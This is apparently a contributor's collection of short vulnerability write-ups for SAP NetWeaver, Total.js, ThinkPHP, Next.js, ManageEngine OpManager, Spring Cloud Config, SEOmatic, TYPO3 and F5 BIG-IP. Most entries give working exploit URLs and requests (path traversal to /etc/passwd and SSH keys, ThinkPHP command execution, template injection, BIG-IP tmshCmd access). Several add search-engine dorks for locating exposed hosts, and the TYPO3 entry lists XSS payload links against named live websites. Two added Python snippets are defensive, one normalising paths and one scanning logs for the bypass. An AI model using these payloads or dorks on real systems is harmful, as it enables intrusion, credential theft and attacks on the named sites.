Mad-robot (37)
Mad-robot's Latest (11) Contributions
Technical Analysis
Description:-
SAP NetWeaver AS JAVA (LM Configuration Wizard), versions – 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system, leading to Missing Authentication Check.
POC
https://github.com/chipik/SAP_RECON/blob/master/RECON.py
Technical Analysis
Totaljs – Unauthenticated Directory Traversal
DESCRIPTION
User can make requests like “GET /../databases/settings.json HTTP/1.1” and include file contents from outside the /public directory, which is the default directory for accessible static files.
Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903
PROOF OF CONCEPT
$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json
#(note that .json is in the extensions list by default)
Technical Analysis
Google dork:- inurl:/api/jsonws
Shodan:- Powered+By+Liferay
publicwww:- https://publicwww.com/websites/Powered+By+Liferay/
Technical Analysis
ThinkPHP RCE
DESCRIPTION
ThinkPHP before 3.2.4, as used in Open Source BMS v1.1.1 and other products, allows Remote Command Execution via public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]= followed by the command.
PROOF OF CONCEPT
The RCE (Remote Command Execution) vulnerability is triggered by an HTTP request. Successfully executed the command “whoami”.
poc:
http://58.82.XXX.XXX:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Technical Analysis
Next.js Path traversal
DESCRIPTION
Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
PROOF OF CONCEPT
HTTP://localhost/_next/static/../server/pages-manifest.json
Technical Analysis
Unauthenticated arbitrary file read on ManageEngine OpManager
DESCRIPTION
The latest release of OpManager contains a directory traversal vulnerability that allows unrestricted access to every file in the OpManager application. This includes private SSH keys, password protected Java keystores, and configuration files containing passwords to keystores, private certificates, and the backend database. If LDAP is configured then domain credentials can be obtained from “conf/OpManager/ldap.conf”.
PROOF OF CONCEPT
REQUEST:
GET /cachestart/125116/cacheend/apiclient/fluidicv2/javascript/jquery/../../../../bin/.ssh_host_rsa_key HTTP/1.1
Host: <HOSTNAME>:8060
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Connection: close
Cache-Control: max-age=0
Referer: http://<HOSTNAME>:8060/
RESPONSE:
HTTP/1.1 200
Set-Cookie: JSESSIONID=4E221B342BC080BC9AC2D19378364E3B; Path=/; HttpOnly
X-FRAME-OPTIONS: DENY
Accept-Ranges: bytes
ETag: W/"902-1586033949624"
Last-Modified: Sat, 04 Apr 2020 20:59:09 GMT
Vary: Accept-Encoding
Date: Mon, 13 Apr 2020 15:40:01 GMT
Connection: close
Content-Length: 902

-----BEGIN RSA PRIVATE KEY-----
MIICX...pXqnO
-----END RSA PRIVATE KEY-----
Here are the files you can read
"bin/.ssh_host_dsa_key", "bin/.ssh_host_dsa_key.pub", "bin/.ssh_host_rsa_key", "bin/.ssh_host_rsa_key.pub", "conf/client.keystore", "conf/customer-config.xml", "conf/database_params.conf", "conf/FirewallAnalyzer/aaa_auth-conf.xml", "conf/FirewallAnalyzer/auth-conf_ppm.xml", "conf/gateway.conf", "conf/itom.truststore", "conf/netflow/auth-conf.xml", "conf/netflow/server.xml", "conf/netflow/ssl_server.xml", "conf/NFAEE/cs_server.xml", "conf/OpManager/database_params.conf", "conf/OpManager/database_params_DE.conf", "conf/OpManager/ldap.conf", "conf/OpManager/MicrosoftSQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params.conf", "conf/OpManager/POSTGRESQL/database_params_DE.conf", "conf/OpManager/securitydbData.xml", "conf/OpManager/SnmpDefaultProperties.xml", "conf/Oputils/snmp/Community.xml", "conf/Persistence/DBconfig.xml", "conf/Persistence/persistence-configurations.xml", "conf/pmp/PMP_API.conf", "conf/pmp/pmp_server_cert.p12", "conf/product-config.xml", "conf/SANSeed.xml", "conf/server.keystore", "conf/server.xml", "conf/system_properties.conf", "conf/tomcat-users.xml", "lib/OPM_APNS_Cert.p12"
Technical Analysis
Directory Traversal with spring-cloud-config-server
DESCRIPTION
Spring Cloud Config, 2.2.x versions before 2.2.3, 2.1.x versions before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.
PROOF OF CONCEPT
http://127.0.0.1:8889/flag.txt%23/222/..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29..%28_%29tmp%28_%29
http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Ftmp%252Fflag.txt%23/222/11
http://127.0.0.1:8889/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/222/11
Video POC
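The Total.js, Next.js, OpManager and spring-cloud-config posts above all reach files outside the intended directory with a variant of `../` (`.%2e`, plain `../`, double-encoded `..%252F`) that slips past a check on the raw URL. The following is an added example, not code from any of those projects, of the check a static-file handler should do instead: decode to a fixed point, strip `;` path parameters, resolve against the root, and refuse anything that lands outside it. The root directories and mount points in CASES are assumed.

```python
import posixpath
from urllib.parse import unquote

def decode_fully(path, max_rounds=3):
    """Percent-decode until stable, so ..%252F (-> ..%2F -> ../) is seen as ../."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def resolve_static(root, request_path):
    """Map a request path to a file under root; return None if it escapes root."""
    path = request_path.split("?", 1)[0]                 # drop the query string
    path = decode_fully(path).replace("\\", "/")         # unify separators
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))  # drop ;params
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, path.lstrip("/")))
    if candidate == root or candidate.startswith(root + "/"):
        return candidate
    return None

# Assumed static roots (constructed); the request paths are the PoC paths from
# the posts above, written relative to the mount point each server maps to root.
CASES = [
    ("Total.js", "/srv/app/public", "/.%2e/databases/settings.json"),
    ("Next.js", "/app/.next/static", "/../server/pages-manifest.json"),
    ("OpManager", "/opt/OpManager/apiclient/fluidicv2/javascript/jquery",
     "/../../../../bin/.ssh_host_rsa_key"),
    ("spring-cloud-config", "/srv/config-repo",
     "/..%252F..%252F..%252Fetc%252Fpasswd%23/222/11"),
    ("benign", "/srv/app/public", "/css/site.css?v=2"),
]

def check_cases():
    """Resolve every case; None means the request was refused."""
    return {name: resolve_static(root, path) for name, root, path in CASES}

if __name__ == "__main__":
    for name, result in check_cases().items():
        print(f"{name:<20} -> {'REFUSED' if result is None else result}")
```

A single `unquote` would leave the spring-cloud path as `..%2F..%2F` and let it through; the fixed-point decode is what makes that case fail closed.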
Technical Analysis
Description-
The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
POC-
HTTP://localhost/actions/seomatic/meta-container/meta-link-container/?uri={{7+'7'}}
HTTP://localhost/actions/seomatic/meta-container/all-meta-containers?uri={{7+'7'}}
Technical Analysis
DESCRIPTION-
TYPO3 6.2.0 to 6.2.38 ELTS and TYPO3 7.0.0 to 7.1.0 (CVE-2020-8091). These versions embed a third-party component named SVG Web which provides svg.swf, a Flash file vulnerable to cross-site scripting.
Google Dork
inurl:"typo3/contrib/websvg"
Works on IE
PROOF OF CONCEPT-
Payload: svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert("XSS"),this.x=1}//
Live sites:
https://www.bulac.fr/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//
www.roz.si/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//
www.urbanek-consulting.com/typo3/contrib/websvg/svg.swf?uniqueId=%22])}catch(e){if(!this.x)alert(%22XSS%22),this.x=1}//
Technical Analysis
CVE-2020-5902
In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
/tmui/login.jsp/..;/tmui/system/user/authproperties.jsp
/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=jaffa
/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin'
Patch & Mitigation:-
<LocationMatch ".*\.\.;.*">
    Redirect 404 /
</LocationMatch>
Versions Affected
- BIG-IP 15.x: 15.1.0/15.0.0
- BIG-IP 14.x: 14.1.0 ~ 14.1.2
- BIG-IP 13.x: 13.1.0 ~ 13.1.3
- BIG-IP 12.x: 12.1.0 ~ 12.1.5
- BIG-IP 11.x: 11.6.1 ~ 11.6.5
Dorks
https://beta.shodan.io/search?query=vuln%3Acve-2020-5902
https://www.shodan.io/search?query=http.favicon.hash%3A-335242539+%223992%22
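The LocationMatch mitigation above keys on the literal `..;` in the URL path; the same string is the thing to hunt for in existing web-server logs. Added example (not from F5 or the page author) that scans constructed Apache-style access-log lines for the `..;` bypass, decoding first so a `%3B`-encoded semicolon is not missed, and rates a hit high only when a 2xx came back for one of the fileRead/tmshCmd pages listed above. The log lines and IPs are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed access-log sample (not from the page); request paths are the
# TMUI paths listed above plus one percent-encoded variant of the bypass.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Jul/2020:10:01:12 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 4821
10.0.0.9 - - [06/Jul/2020:10:01:40 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1432
10.0.0.9 - - [06/Jul/2020:10:02:03 +0000] "GET /tmui/login.jsp/..%3B/tmui/util/getTabSet.jsp?tabId=jaffa HTTP/1.1" 200 932
10.0.0.7 - - [06/Jul/2020:10:03:15 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin HTTP/1.1" 404 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# The same literal the LocationMatch rule keys on.
BYPASS_RE = re.compile(r"\.\.;")
# PoC endpoints from the post that read files or run tmsh once reached.
HIGH_RISK = {"/tmui/locallb/workspace/fileRead.jsp",
             "/tmui/locallb/workspace/tmshCmd.jsp"}

def scan_log(log_text):
    """Return one record per request whose decoded path carries '..;'."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = unquote(m["path"])              # catches %3B-encoded semicolons
        if not BYPASS_RE.search(path):
            continue
        reached = path.split("..;", 1)[1].split("?", 1)[0]  # page behind login.jsp
        served = m["status"].startswith("2")   # a 2xx means the bypass worked
        hits.append({
            "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
            "reached": reached,
            "severity": "high" if served and reached in HIGH_RISK else "medium",
        })
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['status']} {hit['severity']:<6} {hit['reached']}")
```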